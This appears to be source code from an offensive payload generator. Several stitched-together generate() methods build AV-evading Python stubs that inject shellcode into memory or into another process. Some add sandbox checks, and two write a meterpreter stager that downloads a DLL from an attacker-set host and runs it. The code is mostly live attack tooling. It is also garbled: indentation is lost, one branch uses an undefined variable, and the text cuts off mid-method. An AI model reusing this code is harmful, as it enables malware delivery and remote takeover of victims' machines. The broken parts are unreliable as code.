def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(bytes(Shellcode,
'latin-1')).decode('ascii')
# Generate Random Variable Names
ShellcodeVariableName = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
num_tabs_required = 0
payload_code = ''
payload_code, num_tabs_required = gamemaker.senecas_games(self)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
# Generate Random Variable Names
ShellcodeVariableName = evasion_helpers.randomString()
pid_num_variable = evasion_helpers.randomString()
pagerwx_variable = evasion_helpers.randomString()
processall_variable = evasion_helpers.randomString()
memcommit_variable = evasion_helpers.randomString()
shell_length_variable = evasion_helpers.randomString()
memalloc_variable = evasion_helpers.randomString()
prochandle_variable = evasion_helpers.randomString()
kernel32_variable = evasion_helpers.randomString()
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from ctypes import *\n'
payload_code += '\t' * num_tabs_required + pagerwx_variable + ' = 0x40\n'
payload_code += '\t' * num_tabs_required + processall_variable + ' = 0x1F0FFF\n'
payload_code += '\t' * num_tabs_required + memcommit_variable + ' = 0x00001000\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + ' = windll.kernel32\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = b\'' + Shellcode + '\'\n'
payload_code += '\t' * num_tabs_required + pid_num_variable + ' = ' + self.required_options[
"PID_NUMBER"][0] + '\n'
payload_code += '\t' * num_tabs_required + shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n'
payload_code += '\t' * num_tabs_required + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n'
payload_code += '\t' * num_tabs_required + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
RandPtr = evasion_helpers.randomString()
RandHt = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
payload_code, num_tabs_required = gamemaker.senecas_games(self)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName +' = b\'' + Shellcode + '\'\n'
payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName +' = b\'' + Shellcode + '\'\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
PYTHON_SOURCE = self.required_options["PYTHON_SOURCE"][0]
try:
# read in the python source
with open(PYTHON_SOURCE, 'r') as f:
payload_code = f.read()
except IOError:
print(
helpers.color("\n [!] PYTHON_SOURCE file \"" + PYTHON_SOURCE +
"\" not found\n",
warning=True))
return ""
# example of how to check the internal options
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
# return everything
self.payload_source_code = payload_code
return
def generate(self):
payload_code = "import urllib.request, string, random, struct, ctypes, time, ssl\n"
# randomize everything, yo'
sumMethodName = evasion_helpers.randomString()
checkinMethodName = evasion_helpers.randomString()
randLettersName = evasion_helpers.randomString()
randLetterSubName = evasion_helpers.randomString()
randBaseName = evasion_helpers.randomString()
downloadMethodName = evasion_helpers.randomString()
hostName = evasion_helpers.randomString()
portName = evasion_helpers.randomString()
requestName = evasion_helpers.randomString()
tName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
dataName = evasion_helpers.randomString()
byteArrayName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
bufName = evasion_helpers.randomString()
handleName = evasion_helpers.randomString()
data2Name = evasion_helpers.randomString()
proxy_var = evasion_helpers.randomString()
opener_var = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code = ''
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
rand_hostname = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import platform\n'
payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[
"HOSTNAME"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
rand_domain = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import socket\n'
payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[
"DOMAIN"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
rand_processor_count = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
"PROCESSORS"][0] + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import getpass\n'
payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
"USERNAME"][
0] + '\'.lower() in ' + rand_user_name + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
# helper method that returns the sum of all ord values in a string % 0x100
payload_code += "ssl._create_default_https_context = ssl._create_unverified_context\n"
payload_code += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % (
sumMethodName)
# method that generates a new checksum value for checkin to the meterpreter handler
payload_code += "def %s():\n\tfor x in range(64):\n" % (
checkinMethodName)
payload_code += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % (
randBaseName)
payload_code += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % (
randLettersName)
payload_code += "\t\tfor %s in %s:\n" % (randLetterSubName,
randLettersName)
payload_code += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % (
sumMethodName, randBaseName, randLetterSubName, randBaseName,
randLetterSubName)
# method that connects to a host/port over https and downloads the hosted data
payload_code += "def %s(%s,%s):\n" % (downloadMethodName, hostName,
portName)
payload_code += "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
payload_code += "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
payload_code += "\turllib.request.install_opener(" + opener_var + ")\n"
payload_code += "\t%s = urllib.request.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" % (
requestName, hostName, portName, checkinMethodName)
payload_code += "\ttry:\n"
payload_code += "\t\t%s = urllib.request.urlopen(%s)\n" % (tName,
requestName)
payload_code += "\t\ttry:\n"
payload_code += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % (
tName, tName)
payload_code += "\t\t\telse: return ''\n"
payload_code += "\t\texcept: return %s.read()\n" % (tName)
payload_code += "\texcept urllib.request.URLError: return ''\n"
# method to inject a reflective .dll into memory
payload_code += "def %s(%s):\n" % (injectMethodName, dataName)
payload_code += "\tif %s != \"\":\n" % (dataName)
payload_code += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n"
# Assuming heap injection
else:
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
# download the metpreter .dll and inject it
payload_code += "%s = ''\n" % (data2Name)
payload_code += "%s = %s(\"%s\", %s)\n" % (
data2Name, downloadMethodName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += "%s(%s)\n" % (injectMethodName, data2Name)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('latin-1')
Shellcode = Shellcode.decode('unicode_escape')
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(bytes(Shellcode,
'latin-1')).decode('ascii')
# Generate Random Variable Names
ShellcodeVariableName = evasion_helpers.randomString()
RandPtr = evasion_helpers.randomString()
RandHt = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
num_tabs_required = 0
payload_code = ''
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
rand_hostname = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import platform\n'
payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[
"HOSTNAME"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
rand_domain = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import socket\n'
payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[
"DOMAIN"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
rand_processor_count = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
"PROCESSORS"][0] + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import getpass\n'
payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
"USERNAME"][
0] + '\'.lower() in ' + rand_user_name + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomize everything, yo'
sumMethodName = evasion_helpers.randomString()
checkinMethodName = evasion_helpers.randomString()
randLettersName = evasion_helpers.randomString()
randLetterSubName = evasion_helpers.randomString()
randBaseName = evasion_helpers.randomString()
downloadMethodName = evasion_helpers.randomString()
hostName = evasion_helpers.randomString()
portName = evasion_helpers.randomString()
requestName = evasion_helpers.randomString()
tName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
dataName = evasion_helpers.randomString()
byteArrayName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
bufName = evasion_helpers.randomString()
handleName = evasion_helpers.randomString()
data2Name = evasion_helpers.randomString()
proxy_var = evasion_helpers.randomString()
opener_var = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code = "import urllib.request, string, random, struct, time, ssl, ctypes as " + randctypes + "\n"
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# helper method that returns the sum of all ord values in a string % 0x100
payload_code += "ssl._create_default_https_context = ssl._create_unverified_context\n"
payload_code += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % (
sumMethodName)
# method that generates a new checksum value for checkin to the meterpreter handler
payload_code += "def %s():\n\tfor x in range(64):\n" % (
checkinMethodName)
payload_code += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % (
randBaseName)
payload_code += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % (
randLettersName)
payload_code += "\t\tfor %s in %s:\n" % (randLetterSubName,
randLettersName)
payload_code += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % (
sumMethodName, randBaseName, randLetterSubName, randBaseName,
randLetterSubName)
# method that connects to a host/port over https and downloads the hosted data
payload_code += "def %s(%s,%s):\n" % (downloadMethodName, hostName,
portName)
payload_code += "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
payload_code += "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
payload_code += "\turllib.request.install_opener(" + opener_var + ")\n"
payload_code += '\t' * num_tabs_required + "\t" + requestName + " = urllib.request.Request(\"https://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
payload_code += "\ttry:\n"
payload_code += "\t\t%s = urllib.request.urlopen(%s)\n" % (tName,
requestName)
payload_code += "\t\ttry:\n"
payload_code += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % (
tName, tName)
payload_code += "\t\t\telse: return ''\n"
payload_code += "\t\texcept: return %s.read()\n" % (tName)
payload_code += "\texcept urllib.request.URLError: return ''\n"
# method to inject a reflective .dll into memory
payload_code += "def %s(%s):\n" % (injectMethodName, dataName)
payload_code += "\tif %s != \"\":\n" % (dataName)
payload_code += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n"
# Assuming heap injection
else:
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n'
